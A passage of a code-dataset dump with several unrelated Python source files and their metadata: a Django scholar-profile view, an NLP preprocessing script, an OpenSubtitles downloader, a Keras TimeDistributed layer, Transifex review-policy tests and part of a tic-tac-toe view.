View\r\nfrom utils.Token import Authentication\r\nfrom .models import Follow\r\n\r\n\r\nclass GetBaseInfo(View):\r\n model = None\r\n\r\n def get(self, request, *args, **kwargs):\r\n is_login = True\r\n fail, payload = Authentication.authentication(request.META)\r\n if fail:\r\n is_login = False\r\n author_id = request.GET.get('author_id')\r\n if self.model is None:\r\n return JsonResponse({'errno': -1, 'msg': \"模型错误\"})\r\n scholar = self.model.objects.filter(author_id=author_id)\r\n if not scholar:\r\n return JsonResponse({'errno': 1, 'msg': \"学者身份未认领\"})\r\n scholar = scholar[0]\r\n user = scholar.user\r\n # json_data = {\r\n # \"Hotpoint\": scholar.count * 347 + 443 * (scholar.hot_index + 1) + 666,\r\n # 'scholar_id': scholar.field_id,\r\n # 'user_id': user.field_id,\r\n # \"bio\": user.bio,\r\n # \"name\": user.name,\r\n # \"visitors\": scholar.count,\r\n # 'bgimg': scholar.avatar,\r\n # 'papers': scholar.paper_show\r\n # }\r\n json_data = {\r\n \"Hotpoint\": scholar.count * 347 + 443 * (scholar.count + 1) + 666,\r\n 'scholar_id': scholar.field_id,\r\n 'user_id': user.field_id,\r\n \"bio\": user.bio,\r\n \"name\": user.name,\r\n \"visitors\": scholar.count,\r\n 'bgimg': scholar.avatar,\r\n 'papers': scholar.paper_show\r\n }\r\n scholar.count += 1\r\n scholar.save()\r\n if is_login:\r\n uid = payload.get('id')\r\n follow = Follow.objects.filter(user_id=uid, scholar=scholar)\r\n if follow:\r\n json_data['followed'] = True\r\n else:\r\n json_data['followed'] = False\r\n if user.field_id == uid:\r\n json_data['is_mine'] = True\r\n else:\r\n json_data['is_mine'] = False\r\n return JsonResponse(json_data, safe=False)\r\n", "repo_name": "voidzwg/FreeScholarBackEnd", "sub_path": "ScholarPortal/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 2097, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "88", "api": [{"api_name": "django.views.generic.View", "line_number": 8, "usage_type": "name"}, {"api_name": "utils.Token.Authentication.authentication", "line_number": 13, "usage_type": "call"}, {"api_name": "utils.Token.Authentication", "line_number": 13, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 18, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 21, "usage_type": "call"}, {"api_name": "models.Follow.objects.filter", "line_number": 48, "usage_type": "call"}, {"api_name": "models.Follow.objects", "line_number": 48, "usage_type": "attribute"}, {"api_name": "models.Follow", "line_number": 48, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 57, "usage_type": "call"}]} +{"seq_id": "7814508735", "text": "import argparse\nimport glob\nimport os\nimport string\nimport re\nfrom nltk.corpus import stopwords\nfrom nltk.stem.snowball import SnowballStemmer\n\npunctuation = list(string.punctuation)\npunctuation.remove('{')\npunctuation.remove('}')\npunctuation.append('...')\npunctuation.append('--')\npunctuation.append('``')\npunctuation.append(\"''\")\n\nstop_words = set(stopwords.words('english'))\nstemmer = SnowballStemmer('english')\n\ndef write_output(sents, output_path, headers=True):\n if not headers:\n sents = filter(lambda sent: sent != '{{HED}}', sents)\n sents = (sent.strip() for sent in sents)\n with open(output_path, 'w+') as f:\n lines = '\\n'.join(sents)\n f.write(lines)\n\ndef remove_stopwords(sent):\n return (token for token in sent if token not in stop_words)\n\ndef remove_braces(sent):\n for token in sent:\n if re.match('^({{.{3}}})$', token):\n yield token\n else: \n yield token.replace('}','').replace('{','')\n\ndef replace_numerics(sent):\n for token in sent:\n if re.match('^([0-9]+|[0-9\\.]*[iv]+|[0-9]+[\\.a-z]*)$', token):\n yield '{{NUM}}'\n else:\n yield token\n\ndef replace_symbols(sent):\n for i,token in enumerate(sent):\n if i == 0 and token == 'A':\n yield token\n elif len(token) == 1:\n yield '{{SYM}}'\n elif re.match('^[A-Z]+$', token):\n yield '{{ACR}}'\n elif re.match('^[A-Z0-9]+$', token):\n yield '{{SYM}}'\n elif re.match('^[A-Za-z][0-9ijk]+$', token):\n yield '{{SYM}}'\n else:\n yield token\n\ndef stem(sent):\n return (stemmer.stem(token) for token in sent)\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser('Preprocess cmp-lg abstract and article texts.')\n parser.add_argument('documents', type=glob.iglob,\n help='Glob pattern of documents (directories) to preprocess.')\n args = parser.parse_args()\n \n for doc_dir in filter(os.path.isdir, args.documents):\n for doc_part in ['article', 'abstract']:\n doc_txt = '{}/{}.txt'.format(doc_dir, doc_part)\n with open(doc_txt, 'r') as f:\n text = f.read()\n\n for c in set(punctuation) - {'.'}:\n text = text.replace(c, ' ')\n text = text.replace('e.g.', 'eg')\n text = text.replace('i.e.', 'ie')\n text = re.sub(r'[a-z]+\\{.*?\\}', ' ', text)\n text = re.sub(r'\\{\\{EQN\\}\\} (?=[A-Z][a-z]|{{HED}})', '{{EQN}}. ', text)\n text = re.sub(r'(\\s+(?!{{HED}}).*?)\\s+({{HED}})', '\\g<1>. {{HED}}', text)\n sents = re.split('({{EQN}}|\\.)\\s+({{HED}}|[A-Z][A-Za-z\\s{}0-9]+)', text)\n sents = [re.sub('\\s+', ' ', sent) for sent in sents if len(sent) and sent[0] != '.']\n \n sents_file = '{}/{}.sentences'.format(doc_dir, doc_part)\n write_output(sents, sents_file, headers=False)\n\n sents = ((sent.split(' ')) for sent in sents)\n sents = (remove_stopwords(sent) for sent in sents)\n sents = (remove_braces(sent) for sent in sents)\n sents = (replace_numerics(sent) for sent in sents)\n sents = (replace_symbols(sent) for sent in sents)\n sents = (stem(sent) for sent in sents)\n sents = (' '.join(sent) for sent in sents)\n \n tokens_file = '{}/{}.tokens'.format(doc_dir, doc_part)\n write_output(sents, tokens_file)\n\n\n", "repo_name": "joshualoehr/natural-language-processing", "sub_path": "final/cmp-lg/preprocess_cmp_lg.py", "file_name": "preprocess_cmp_lg.py", "file_ext": "py", "file_size_in_byte": 3464, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "string.punctuation", "line_number": 9, "usage_type": "attribute"}, {"api_name": "nltk.corpus.stopwords.words", "line_number": 17, "usage_type": "call"}, {"api_name": "nltk.corpus.stopwords", "line_number": 17, "usage_type": "name"}, {"api_name": "nltk.stem.snowball.SnowballStemmer", "line_number": 18, "usage_type": "call"}, {"api_name": "re.match", "line_number": 33, "usage_type": "call"}, {"api_name": "re.match", "line_number": 40, "usage_type": "call"}, {"api_name": "re.match", "line_number": 51, "usage_type": "call"}, {"api_name": "re.match", "line_number": 53, "usage_type": "call"}, {"api_name": "re.match", "line_number": 55, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 64, "usage_type": "call"}, {"api_name": "glob.iglob", "line_number": 65, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 69, "usage_type": "attribute"}, {"api_name": "re.sub", "line_number": 79, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 80, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 81, "usage_type": "call"}, {"api_name": "re.split", "line_number": 82, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 83, "usage_type": "call"}]} +{"seq_id": "34809188662", "text": "import logging\nimport constants\nfrom xmlrpc.client import ServerProxy, Transport\nimport zlib\nimport base64\n\ndef login():\n transport = Transport()\n transport.user_agent = constants.USER_AGENT_OPENSUBS\n xmlrpc = ServerProxy(constants.OPENSUBTITLES_URL, allow_none=True, transport=transport)\n try:\n data = xmlrpc.LogIn(constants.USERNAME, constants.PASSWORD, constants.LANGUAGE, constants.USER_AGENT_OPENSUBS)\n except:\n logging.warning(\"Error occured while establishing connection to opensubtitles...\")\n return None,None\n if '200' == data.get('status').split()[0]:\n logging.info(\"Got token from opensubtitles\")\n return data.get('token'),xmlrpc \n else: \n logging.warning(\"Error occured while getting opensubtitles token. Returned status as \"+data.get('status').split()[0])\n return None\n\ndef getSubs(hash,size,lang):\n logging.basicConfig(level=logging.DEBUG)\n logging.info(\"Searching subs in opensubtitles...\")\n\n token,xmlrpc = login()\n if token:\n data=xmlrpc.SearchSubtitles(token, [{'sublanguageid': 'eng', 'moviehash': hash, 'moviebytesize': size}])\n if '200' == data.get('status').split()[0]:\n logging.info(\"Searching subtitles ended successfully...\")\n data=data.get('data') \n if not data:\n logging.warning(\"Empty data returned from opensubtitles...\")\n return None\n data=xmlrpc.DownloadSubtitles(token, [data[0].get('IDSubtitleFile')])\n if '200' == data.get('status').split()[0]:\n logging.info(\"Downloading subtitles ended successfully...\")\n encoded_data=data.get('data') \n if not encoded_data:\n logging.warning(\"Downloaded data is empty...\")\n return None\n try:\n decoded_data = base64.b64decode(encoded_data[0].get('data'))\n decoded_data = zlib.decompress(decoded_data, 16+zlib.MAX_WBITS)\n decoded_data = decoded_data.decode('utf-8')\n except:\n logging.warning(\"Error occured while decoding data...\")\n return None\n if not decoded_data:\n logging.warning(\"Decoded data is empty...\")\n return None\n return decoded_data\n else:\n logging.warning(\"Error occured while downloading subtitles. Error code is: \"+data.get('status').split()[0])\n return None \n else:\n logging.warning(\"Error occured while searching subtitles. Error code is: \"+data.get('status').split()[0])\n return None \n return None", "repo_name": "mugdha-adhav/subtitle-downloader", "sub_path": "src/opensubtitles.py", "file_name": "opensubtitles.py", "file_ext": "py", "file_size_in_byte": 2726, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "xmlrpc.client.Transport", "line_number": 8, "usage_type": "call"}, {"api_name": "constants.USER_AGENT_OPENSUBS", "line_number": 9, "usage_type": "attribute"}, {"api_name": "xmlrpc.client", "line_number": 10, "usage_type": "name"}, {"api_name": "xmlrpc.client.ServerProxy", "line_number": 10, "usage_type": "call"}, {"api_name": "constants.OPENSUBTITLES_URL", "line_number": 10, "usage_type": "attribute"}, {"api_name": "xmlrpc.client.LogIn", "line_number": 12, "usage_type": "call"}, {"api_name": "xmlrpc.client", "line_number": 12, "usage_type": "name"}, {"api_name": "constants.USERNAME", "line_number": 12, "usage_type": "attribute"}, {"api_name": "constants.PASSWORD", "line_number": 12, "usage_type": "attribute"}, {"api_name": "constants.LANGUAGE", "line_number": 12, "usage_type": "attribute"}, {"api_name": "constants.USER_AGENT_OPENSUBS", "line_number": 12, "usage_type": "attribute"}, {"api_name": "logging.warning", "line_number": 14, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 17, "usage_type": "call"}, {"api_name": "xmlrpc.client", "line_number": 18, "usage_type": "name"}, {"api_name": "logging.warning", "line_number": 20, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 24, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 24, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 25, "usage_type": "call"}, {"api_name": "xmlrpc.client", "line_number": 27, "usage_type": "name"}, {"api_name": "xmlrpc.client.SearchSubtitles", "line_number": 29, "usage_type": "call"}, {"api_name": "xmlrpc.client", "line_number": 29, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 31, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 34, "usage_type": "call"}, {"api_name": "xmlrpc.client.DownloadSubtitles", "line_number": 36, "usage_type": "call"}, {"api_name": "xmlrpc.client", "line_number": 36, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 38, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 41, "usage_type": "call"}, {"api_name": "base64.b64decode", "line_number": 44, "usage_type": "call"}, {"api_name": "zlib.decompress", "line_number": 45, "usage_type": "call"}, {"api_name": "zlib.MAX_WBITS", "line_number": 45, "usage_type": "attribute"}, {"api_name": "logging.warning", "line_number": 48, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 51, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 55, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 58, "usage_type": "call"}]} +{"seq_id": "2774594899", "text": "from keras import backend as K\nfrom keras.layers import InputSpec, TimeDistributed as KerasTimeDistributed\nfrom overrides import overrides\n\nclass TimeDistributed(KerasTimeDistributed):\n \"\"\"\n This class fixes two bugs in Keras: (1) the input mask is not passed to the wrapped layer, and\n (2) Keras' TimeDistributed currently only allows a single input, not a list. We currently\n don't handle the case where the _output_ of the wrapped layer is a list, however. (Not that\n that's particularly hard, we just haven't needed it yet, so haven't implemented it.)\n\n Notes\n -----\n If the output shape for TimeDistributed has a final dimension of 1, we essentially sqeeze it,\n reshaping to have one fewer dimension. That change takes place in the actual ``call`` method as well as\n the ``compute_output_shape`` method.\n \"\"\"\n def __init__(self, layer, keep_dims=False, **kwargs):\n self.keep_dims = keep_dims\n super(TimeDistributed, self).__init__(layer, **kwargs)\n\n @overrides\n def build(self, input_shape):\n if isinstance(input_shape, tuple):\n input_shape = [input_shape]\n assert all(len(shape) >= 3 for shape in input_shape), \"Need 3 dims to TimeDistribute\"\n all_timesteps = [i[1] for i in input_shape]\n assert len(set(all_timesteps)) == 1, \"Tensors must have same number of timesteps\"\n self.input_spec = [InputSpec(shape=shape) for shape in input_shape]\n if not self.layer.built:\n child_input_shape = [(shape[0],) + shape[2:] for shape in input_shape]\n if len(input_shape) == 1:\n child_input_shape = child_input_shape[0]\n self.layer.build(child_input_shape)\n self.layer.built = True\n self.built = True\n # It's important that we call Wrapper.build() here, because it sets some important member\n # variables. But we can't call KerasTimeDistributed.build(), because it assumes only one\n # input, which we're trying to fix. So we use super(KerasTimeDistributed, self).build()\n # here on purpose - this is not a copy-paste bug.\n super(KerasTimeDistributed, self).build(input_shape) # pylint: disable=bad-super-call\n\n @overrides\n def compute_output_shape(self, input_shape):\n if not isinstance(input_shape, list):\n input_shape = [input_shape]\n child_input_shape = [(shape[0],) + shape[2:] for shape in input_shape]\n timesteps = input_shape[0][1]\n if len(input_shape) == 1:\n child_input_shape = child_input_shape[0]\n child_output_shape = self.layer.compute_output_shape(child_input_shape)\n reshaped_shape = (child_output_shape[0], timesteps) + child_output_shape[1:]\n if reshaped_shape[-1] == 1 and not self.keep_dims:\n reshaped_shape = reshaped_shape[:-1]\n return reshaped_shape\n\n def get_output_mask_shape_for(self, input_shape):\n if not isinstance(input_shape, list):\n input_shape = [input_shape]\n child_input_shape = [(shape[0],) + shape[2:] for shape in input_shape]\n timesteps = input_shape[0][1]\n if len(input_shape) == 1:\n child_input_shape = child_input_shape[0]\n child_output_shape = self.layer.get_output_mask_shape_for(child_input_shape)\n return (child_output_shape[0], timesteps) + child_output_shape[1:]\n\n @staticmethod\n def reshape_inputs_and_masks(inputs, masks):\n reshaped_xs = []\n reshaped_masks = []\n for x_i, mask_i in zip(inputs, masks):\n input_shape = K.int_shape(x_i)\n reshaped_x = K.reshape(x_i, (-1,) + input_shape[2:]) # (batch_size * timesteps, ...)\n if mask_i is not None:\n mask_ndim = K.ndim(mask_i)\n input_ndim = K.ndim(x_i)\n if mask_ndim == input_ndim:\n mask_shape = input_shape\n elif mask_ndim == input_ndim - 1:\n mask_shape = input_shape[:-1]\n else:\n raise Exception(\"Mask is of an unexpected shape. Mask's ndim: %s, input's ndim %s\" %\n (mask_ndim, input_ndim))\n mask_i = K.reshape(mask_i, (-1,) + mask_shape[2:]) # (batch_size * timesteps, ...)\n reshaped_xs.append(reshaped_x)\n reshaped_masks.append(mask_i)\n if len(inputs) == 1:\n reshaped_xs = reshaped_xs[0]\n reshaped_masks = reshaped_masks[0]\n return reshaped_xs, reshaped_masks\n\n @overrides\n def call(self, inputs, mask=None):\n # Much of this is copied from the Keras 1.0(ish) version of TimeDistributed, though we've\n # modified it quite a bit, to fix the problems mentioned in the docstring and to use better\n # names.\n if not isinstance(inputs, list):\n inputs = [inputs]\n mask = [mask]\n else:\n if mask is None:\n mask = [None] * len(inputs)\n timesteps = K.int_shape(inputs[0])[1]\n input_shape = [K.int_shape(x_i) for x_i in inputs]\n if len(inputs) == 1:\n input_shape = input_shape[0]\n if len(inputs) == 1 and input_shape[0]:\n # The batch size is passed when defining the layer in some cases (for example if it is\n # stateful). We respect the input shape in that case and don't reshape the input. This\n # is slower. K.rnn also expects only a single tensor, so we can't do this if we have\n # multiple inputs.\n inputs = inputs[0]\n mask = mask[0]\n def step(x_i, _):\n output = self.layer.call(x_i)\n return output, []\n _, outputs, _ = K.rnn(step, inputs, mask=mask, initial_states=[])\n else:\n reshaped_xs, reshaped_masks = self.reshape_inputs_and_masks(inputs, mask)\n outputs = self.layer.call(reshaped_xs, mask=reshaped_masks)\n output_shape = self.compute_output_shape(input_shape)\n reshaped_shape = (-1, timesteps) + output_shape[2:]\n if reshaped_shape[-1] == 1 and not self.keep_dims:\n reshaped_shape = reshaped_shape[:-1]\n outputs = K.reshape(outputs, reshaped_shape)\n return outputs\n\n @overrides\n def compute_mask(self, inputs, mask=None): # pylint: disable=unused-argument\n if isinstance(mask, list):\n if not any(mask):\n return None\n else:\n raise RuntimeError(\"This version of TimeDistributed doesn't handle multiple masked \"\n \"inputs! Use a subclass of TimeDistributed instead.\")\n return mask\n\n @overrides\n def get_config(self):\n base_config = super(TimeDistributed, self).get_config()\n config = {'keep_dims': self.keep_dims}\n config.update(base_config)\n return config\n", "repo_name": "allenai/deep_qa", "sub_path": "deep_qa/layers/wrappers/time_distributed.py", "file_name": "time_distributed.py", "file_ext": "py", "file_size_in_byte": 6910, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 406, "dataset": "github-code", "pt": "88", "api": [{"api_name": "keras.layers.TimeDistributed", "line_number": 5, "usage_type": "name"}, {"api_name": "keras.layers.InputSpec", "line_number": 29, "usage_type": "call"}, {"api_name": "keras.layers.TimeDistributed", "line_number": 41, "usage_type": "argument"}, {"api_name": "overrides.overrides", "line_number": 22, "usage_type": "name"}, {"api_name": "overrides.overrides", "line_number": 43, "usage_type": "name"}, {"api_name": "keras.backend.int_shape", "line_number": 72, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 72, "usage_type": "name"}, {"api_name": "keras.backend.reshape", "line_number": 73, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 73, "usage_type": "name"}, {"api_name": "keras.backend.ndim", "line_number": 75, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 75, "usage_type": "name"}, {"api_name": "keras.backend.ndim", "line_number": 76, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 76, "usage_type": "name"}, {"api_name": "keras.backend.reshape", "line_number": 84, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 84, "usage_type": "name"}, {"api_name": "keras.backend.int_shape", "line_number": 103, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 103, "usage_type": "name"}, {"api_name": "keras.backend.int_shape", "line_number": 104, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 104, "usage_type": "name"}, {"api_name": "keras.backend.rnn", "line_number": 117, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 117, "usage_type": "name"}, {"api_name": "keras.backend.reshape", "line_number": 125, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 125, "usage_type": "name"}, {"api_name": "overrides.overrides", "line_number": 92, "usage_type": "name"}, {"api_name": "overrides.overrides", "line_number": 128, "usage_type": "name"}, {"api_name": "overrides.overrides", "line_number": 138, "usage_type": "name"}]} +{"seq_id": "30482165068", "text": "import pytest\nfrom mock import patch\nfrom transifex.native.tools.migrations.models import (Confidence,\n FileMigration,\n StringMigration)\nfrom transifex.native.tools.migrations.review import (\n REVIEW_ACCEPT, FileReviewPolicy, LowConfidenceFileReviewPolicy,\n LowConfidenceStringReviewPolicy, ReviewPolicy, StringReviewPolicy,\n add_line_prefix)\n\n\ndef test_base_class_policy_accepts_all():\n policy = ReviewPolicy()\n assert policy.review_file(_file()) == REVIEW_ACCEPT\n assert policy.review_string(_string(), 1, 1) == REVIEW_ACCEPT\n\n\n@patch('transifex.native.tools.migrations.review.ReviewPolicy'\n '.prompt_for_string')\n@patch('transifex.native.tools.migrations.review.ReviewPolicy'\n '.prompt_for_file')\ndef test_file_review_policy_prompts_for_file(mock_file_prompt,\n mock_string_prompt):\n # This policy prompts for any files\n policy = FileReviewPolicy()\n file_migration = _file()\n policy.review_file(file_migration)\n mock_file_prompt.assert_called_once_with(file_migration)\n\n # This policy does not prompt for strings\n policy.review_string(_string(Confidence.HIGH),\n string_cnt=1, strings_total=5)\n policy.review_string(_string(Confidence.LOW),\n string_cnt=1, strings_total=5)\n assert mock_string_prompt.call_count == 0\n\n\n@patch('transifex.native.tools.migrations.review.ReviewPolicy'\n '.prompt_for_string')\n@patch('transifex.native.tools.migrations.review.ReviewPolicy'\n '.prompt_for_file')\ndef test_low_file_review_policy_prompts_for_file_with_low_conf_strings(\n mock_file_prompt, mock_string_prompt\n):\n # This policy prompts for files that include a string with low confidence\n policy = LowConfidenceFileReviewPolicy()\n file_migration = _file()\n file_migration.add_string(_string(Confidence.HIGH))\n file_migration.add_string(_string(Confidence.HIGH))\n file_migration.add_string(_string(Confidence.LOW))\n policy.review_file(file_migration)\n mock_file_prompt.assert_called_once_with(file_migration)\n\n # This policy does not prompt for strings\n policy.review_string(_string(Confidence.HIGH),\n string_cnt=1, strings_total=5)\n policy.review_string(_string(Confidence.LOW),\n string_cnt=1, strings_total=5)\n assert mock_string_prompt.call_count == 0\n\n\n@patch('transifex.native.tools.migrations.review.ReviewPolicy'\n '.prompt_for_file')\ndef test_low_file_review_policy_not_prompts_for_file_with_high_conf_strings(\n mock_file_prompt\n):\n # This policy prompts for files that include a string with low confidence\n policy = LowConfidenceFileReviewPolicy()\n file_migration = _file()\n file_migration.add_string(_string(Confidence.HIGH))\n file_migration.add_string(_string(Confidence.HIGH))\n file_migration.add_string(_string(Confidence.HIGH))\n policy.review_file(file_migration)\n assert mock_file_prompt.call_count == 0\n\n\n@patch('transifex.native.tools.migrations.review.ReviewPolicy'\n '.prompt_for_string')\n@patch('transifex.native.tools.migrations.review.ReviewPolicy'\n '.prompt_for_file')\ndef test_string_review_policy_prompts_for_string(mock_file_prompt,\n mock_string_prompt):\n # This policy prompts for all strings\n policy = StringReviewPolicy()\n string_migration1 = _string(Confidence.HIGH)\n policy.review_string(string_migration1, 5, 10)\n string_migration2 = _string(Confidence.LOW)\n policy.review_string(string_migration2, 15, 20)\n assert mock_string_prompt.call_args_list[0][0] == (\n string_migration1, 5, 10)\n assert mock_string_prompt.call_args_list[1][0] == (\n string_migration2, 15, 20)\n\n # This policy does not prompt for file reviews\n policy.review_file(_file())\n assert mock_file_prompt.call_count == 0\n\n\n@patch('transifex.native.tools.migrations.review.ReviewPolicy'\n '.prompt_for_string')\n@patch('transifex.native.tools.migrations.review.ReviewPolicy'\n '.prompt_for_file')\ndef test_low_string_review_policy_prompts_for_low_conf_string_only(\n mock_file_prompt, mock_string_prompt\n):\n # This policy prompts for strings that have a low confidence\n policy = LowConfidenceStringReviewPolicy()\n string_migration = _string(Confidence.HIGH)\n policy.review_string(string_migration, 5, 10)\n string_migration = _string(Confidence.LOW)\n policy.review_string(string_migration, 10, 10)\n mock_string_prompt.assert_called_once_with(string_migration, 10, 10)\n\n # This policy does not prompt for file reviews\n policy.review_file(_file())\n assert mock_file_prompt.call_count == 0\n\n\ndef test_set_comment_format_exception_for_wrong_format():\n # An exception should be raised if the given format does not include {}\n policy = ReviewPolicy()\n with pytest.raises(ValueError):\n policy.set_comment_format('{')\n\n\ndef test_add_line_prefix():\n text = \"This\\nis\\ngood\"\n assert add_line_prefix(text, '+ ') == \"+ This\\n+ is\\n+ good\"\n assert add_line_prefix(text, '+ ', 99) == \\\n \"99 + This\\n100 + is\\n101 + good\"\n assert add_line_prefix('', '+ ') == ''\n assert add_line_prefix(None, '+ ') is None\n\n\ndef _string(confidence=Confidence.HIGH):\n \"\"\"Return a sample StringMigration object for testing.\"\"\"\n return StringMigration('original', 'new', confidence)\n\n\ndef _file():\n \"\"\"Return a sample FileMigration object for testing.\"\"\"\n return FileMigration('filename', 'content')\n", "repo_name": "transifex/transifex-python", "sub_path": "tests/native/core/test_tools/test_migrations/test_review.py", "file_name": "test_review.py", "file_ext": "py", "file_size_in_byte": 5632, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 32, "dataset": "github-code", "pt": "86", "api": [{"api_name": "transifex.native.tools.migrations.review.ReviewPolicy", "line_number": 13, "usage_type": "call"}, {"api_name": "transifex.native.tools.migrations.review.REVIEW_ACCEPT", "line_number": 14, "usage_type": "name"}, {"api_name": "transifex.native.tools.migrations.review.REVIEW_ACCEPT", "line_number": 15, "usage_type": "name"}, {"api_name": "transifex.native.tools.migrations.review.FileReviewPolicy", "line_number": 25, "usage_type": "call"}, {"api_name": "transifex.native.tools.migrations.models.Confidence.HIGH", "line_number": 31, "usage_type": "attribute"}, {"api_name": "transifex.native.tools.migrations.models.Confidence", "line_number": 31, "usage_type": "name"}, {"api_name": "transifex.native.tools.migrations.models.Confidence.LOW", "line_number": 33, "usage_type": "attribute"}, {"api_name": "transifex.native.tools.migrations.models.Confidence", "line_number": 33, "usage_type": "name"}, {"api_name": "mock.patch", "line_number": 18, "usage_type": "call"}, {"api_name": "mock.patch", "line_number": 20, "usage_type": "call"}, {"api_name": "transifex.native.tools.migrations.review.LowConfidenceFileReviewPolicy", "line_number": 46, "usage_type": "call"}, {"api_name": "transifex.native.tools.migrations.models.Confidence.HIGH", "line_number": 48, "usage_type": "attribute"}, {"api_name": "transifex.native.tools.migrations.models.Confidence", "line_number": 48, "usage_type": "name"}, {"api_name": "transifex.native.tools.migrations.models.Confidence.HIGH", "line_number": 49, "usage_type": "attribute"}, {"api_name": "transifex.native.tools.migrations.models.Confidence", "line_number": 49, "usage_type": "name"}, {"api_name": "transifex.native.tools.migrations.models.Confidence.LOW", "line_number": 50, "usage_type": "attribute"}, {"api_name": "transifex.native.tools.migrations.models.Confidence", "line_number": 50, "usage_type": "name"}, {"api_name": "transifex.native.tools.migrations.models.Confidence.HIGH", "line_number": 55, "usage_type": "attribute"}, {"api_name": "transifex.native.tools.migrations.models.Confidence", "line_number": 55, "usage_type": "name"}, {"api_name": "transifex.native.tools.migrations.models.Confidence.LOW", "line_number": 57, "usage_type": "attribute"}, {"api_name": "transifex.native.tools.migrations.models.Confidence", "line_number": 57, "usage_type": "name"}, {"api_name": "mock.patch", "line_number": 38, "usage_type": "call"}, {"api_name": "mock.patch", "line_number": 40, "usage_type": "call"}, {"api_name": "transifex.native.tools.migrations.review.LowConfidenceFileReviewPolicy", "line_number": 68, "usage_type": "call"}, {"api_name": "transifex.native.tools.migrations.models.Confidence.HIGH", "line_number": 70, "usage_type": "attribute"}, {"api_name": "transifex.native.tools.migrations.models.Confidence", "line_number": 70, "usage_type": "name"}, {"api_name": "transifex.native.tools.migrations.models.Confidence.HIGH", "line_number": 71, "usage_type": "attribute"}, {"api_name": "transifex.native.tools.migrations.models.Confidence", "line_number": 71, "usage_type": "name"}, {"api_name": "transifex.native.tools.migrations.models.Confidence.HIGH", "line_number": 72, "usage_type": "attribute"}, {"api_name": "transifex.native.tools.migrations.models.Confidence", "line_number": 72, "usage_type": "name"}, {"api_name": "mock.patch", "line_number": 62, "usage_type": "call"}, {"api_name": "transifex.native.tools.migrations.review.StringReviewPolicy", "line_number": 84, "usage_type": "call"}, {"api_name": "transifex.native.tools.migrations.models.Confidence.HIGH", "line_number": 85, "usage_type": "attribute"}, {"api_name": "transifex.native.tools.migrations.models.Confidence", "line_number": 85, "usage_type": "name"}, {"api_name": "transifex.native.tools.migrations.models.Confidence.LOW", "line_number": 87, "usage_type": "attribute"}, {"api_name": "transifex.native.tools.migrations.models.Confidence", "line_number": 87, "usage_type": "name"}, {"api_name": "mock.patch", "line_number": 77, "usage_type": "call"}, {"api_name": "mock.patch", "line_number": 79, "usage_type": "call"}, {"api_name": "transifex.native.tools.migrations.review.LowConfidenceStringReviewPolicy", "line_number": 107, "usage_type": "call"}, {"api_name": "transifex.native.tools.migrations.models.Confidence.HIGH", "line_number": 108, "usage_type": "attribute"}, {"api_name": "transifex.native.tools.migrations.models.Confidence", "line_number": 108, "usage_type": "name"}, {"api_name": "transifex.native.tools.migrations.models.Confidence.LOW", "line_number": 110, "usage_type": "attribute"}, {"api_name": "transifex.native.tools.migrations.models.Confidence", "line_number": 110, "usage_type": "name"}, {"api_name": "mock.patch", "line_number": 99, "usage_type": "call"}, {"api_name": "mock.patch", "line_number": 101, "usage_type": "call"}, {"api_name": "transifex.native.tools.migrations.review.ReviewPolicy", "line_number": 121, "usage_type": "call"}, {"api_name": "pytest.raises", "line_number": 122, "usage_type": "call"}, {"api_name": "transifex.native.tools.migrations.review.add_line_prefix", "line_number": 128, "usage_type": "call"}, {"api_name": "transifex.native.tools.migrations.review.add_line_prefix", "line_number": 129, "usage_type": "call"}, {"api_name": "transifex.native.tools.migrations.review.add_line_prefix", "line_number": 131, "usage_type": "call"}, {"api_name": "transifex.native.tools.migrations.review.add_line_prefix", "line_number": 132, "usage_type": "call"}, {"api_name": "transifex.native.tools.migrations.models.Confidence.HIGH", "line_number": 135, "usage_type": "attribute"}, {"api_name": "transifex.native.tools.migrations.models.Confidence", "line_number": 135, "usage_type": "name"}, {"api_name": "transifex.native.tools.migrations.models.StringMigration", "line_number": 137, "usage_type": "call"}, {"api_name": "transifex.native.tools.migrations.models.FileMigration", "line_number": 142, "usage_type": "call"}]} +{"seq_id": "40310999934", "text": "from django.shortcuts import render\nfrom django.http import HttpResponse\n\n# Create your views here.\ndef shouldReset(board):\n\t\tfor row in board:\n\t\t\tif row[0] != '_' and row[0] == row[1] and row[1] == row[2]:\n\t\t\t\treturn True\n\n\t\tfor col in range(0, 3):\n\t\t\tif board[0][col] != '_' and board[0][col] == board[1][col] and board[1][col] == board[2][col]:\n\t\t\t\treturn True\n\t\t\n\t\tif board[1][1] != '_':\n\t\t\tif board[0][0] 